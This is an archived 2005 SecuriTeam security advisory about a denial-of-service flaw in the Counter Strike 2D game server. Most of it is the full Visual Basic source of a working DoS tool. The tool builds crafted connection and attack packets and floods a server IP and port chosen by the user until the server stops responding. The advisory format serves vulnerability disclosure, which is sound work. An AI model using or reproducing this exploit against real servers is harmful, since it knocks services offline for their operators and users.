Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[EXPL] Counter Strike 2D DoS (Exploit)

from [SecuriTeam] Network Security [Permanent Link]
Subject: [EXPL] Counter Strike 2D DoS (Exploit)
Date: 13 Sep 2005 17:06:15 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Counter Strike 2D DoS (Exploit)
------------------------------------------------------------------------


SUMMARY

" <http://www.cs2d.com/> Counter-Strike 2D is a 2D Clone of the most 
famous Multiplayer Game ever: Counter-Strike by Valve Software." By 
sending crafted packets will cause Counter Strike 2D to enter to a DoS 
condition.

DETAILS

Vulnerable Systems:
 * Counter Strike 2D Windows version 1.0.1.0 and prior

By repeating the same packet more then once, Counter Strike 2D will enter 
a loop and will stop responding after several sending of the packets .

Exploit:
VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Begin VB.Form frmMain
  BorderStyle = 4 'Festes Werkzeugfenster
  Caption = "CS2D DoS - tHa_imaX"
  ClientHeight = 2160
  ClientLeft = 45
  ClientTop = 315
  ClientWidth = 3195
  BeginProperty Font
   Name = "Verdana"
   Size = 8.25
   Charset = 0
   Weight = 400
   Underline = 0 'False
   Italic = 0 'False
   Strikethrough = 0 'False
  EndProperty
  Icon = "frmMain.frx":0000
  LinkTopic = "Form1"
  MaxButton = 0 'False
  MinButton = 0 'False
  ScaleHeight = 2160
  ScaleWidth = 3195
  ShowInTaskbar = 0 'False
  StartUpPosition = 3 'Windows-Standard
  Begin VB.CommandButton cmdAttack
   Caption = "[Attack]"
   Height = 285
   Left = 45
   TabIndex = 9
   Top = 1545
   Width = 3090
  End
  Begin VB.Frame Frame1
   Caption = "Attack Settings"
   Height = 1560
   Left = 45
   TabIndex = 0
   Top = -15
   Width = 3105
   Begin VB.TextBox txtName
     Alignment = 2 'Zentriert
     Appearance = 0 '2D
     Height = 285
     Left = 1305
     TabIndex = 8
     Text = "jack_lalane"
     Top = 1230
     Width = 1740
   End
   Begin VB.TextBox txtPC
     Alignment = 2 'Zentriert
     Appearance = 0 '2D
     Height = 270
     Left = 1305
     TabIndex = 6
     Text = "50"
     Top = 810
     Width = 1740
   End
   Begin VB.TextBox txtPort
     Alignment = 2 'Zentriert
     Appearance = 0 '2D
     Height = 285
     Left = 1305
     TabIndex = 4
     Text = "36963"
     Top = 510
     Width = 1740
   End
   Begin VB.TextBox txtIP
     Alignment = 2 'Zentriert
     Appearance = 0 '2D
     Height = 285
     Left = 1305
     TabIndex = 2
     Text = "127.0.0.1"
     Top = 210
     Width = 1740
   End
   Begin VB.Label Label4
     Caption = "Player Name:"
     Height = 210
     Left = 60
     TabIndex = 7
     Top = 1260
     Width = 1185
   End
   Begin VB.Label Label3
     Caption = "Packet Count:"
     Height = 210
     Left = 60
     TabIndex = 5
     Top = 840
     Width = 1245
   End
   Begin VB.Label Label2
     Caption = "Server Port:"
     Height = 210
     Left = 60
     TabIndex = 3
     Top = 525
     Width = 1065
   End
   Begin VB.Label Label1
     Caption = "Server IP:"
     Height = 210
     Left = 60
     TabIndex = 1
     Top = 240
     Width = 960
   End
  End
  Begin MSWinsockLib.Winsock wS
   Left = 2865
   Top = -45
   _ExtentX = 741
   _ExtentY = 741
   _Version = 393216
   Protocol = 1
  End
  Begin VB.Label lblS
   Caption = "DoS Loaded..."
   Height = 255
   Left = 45
   TabIndex = 10
   Top = 1905
   Width = 3090
  End
End
Attribute VB_Name = "frmMain"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'***WRITTEN BY tHa_imaX [tHa_imaX@yahoo.de]
'***23.08.2005
'***NEED A JOINT NOW ;)

Dim ConnectionPacket As String ' Declare our Connection String
Dim DoSPacket As String ' Declare our DoS Packet
Dim pC As Integer ' Packet Count
Private Sub cmdAttack_Click()
 'First we define the Connect Packet
 ConnectionPacket = Chr(Val("&hFA")) & Chr(Val("&hFA")) & _
           Chr(Val("&h0D")) & Chr(Val("&h0A")) & _
           "<name>" & _
           Chr(Val("&hCE")) & Chr(Val("&h7B")) & Chr(Val("&hE2")) & _
           Chr(Val("&h45")) & Chr(Val("&h63")) & Chr(Val("&h90")) & _
           Chr(Val("&h00")) & Chr(Val("&h00"))
           
 'At twice we define our DoS Packet
 DoSPacket = Chr(Val("&hFA")) & Chr(Val("&h04")) & _
            "<name>" & _
            Chr(Val("&h0D")) & Chr(Val("&h0A")) & Chr(Val("&h02"))

 'Now we prepare the packets (insert our playername)
 ConnectionPacket = Replace(ConnectionPacket, "<name>", txtName.Text)
 DoSPacket = Replace(DoSPacket, "<name>", txtName.Text)
 
 'Set the pC to zero
 pC = 0
 
 'Lets send the First Packet to tell the server who we are
 wS.RemoteHost = txtIP.Text
 wS.RemotePort = Val(txtPort.Text)
 wS.SendData ConnectionPacket
End Sub

Private Sub wS_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next ' Ignore Errors
 
 'Count the Packets to Cancel the attack after the packetcount value
 pC = pC + 1
 If pC >= Val(txtPC.Text) Then
  lblS.Caption = "Done."
  Exit Sub
 End If
 lblS = "Total Packets: " & pC
 
 'Dim tmp As String
 'wS.GetData tmp
 'Debug.Print tmp
 
 
 'Send the DoSPacket if the Server send something=>loop
 wS.SendData DoSPacket
 
 'Handle Errors
 If Err <> 0 Then
  MsgBox Err.Description
  pC = Val(txtPC.Text)
 End If
End Sub

'EoF


ADDITIONAL INFORMATION

The information has been provided by  <mailto:the_imax@yahoo.de> X X.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] Counter Strike 2D DoS (Exploit), SecuriTeam <=
Previous by Date:  [UNIX] PPPd DoS, SecuriTeam
Next by Date:  [TOOL] OpenSC Smart Card Library, SecuriTeam
Previous by Thread:  [UNIX] PPPd DoS, SecuriTeam
Next by Thread:  [TOOL] OpenSC Smart Card Library, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]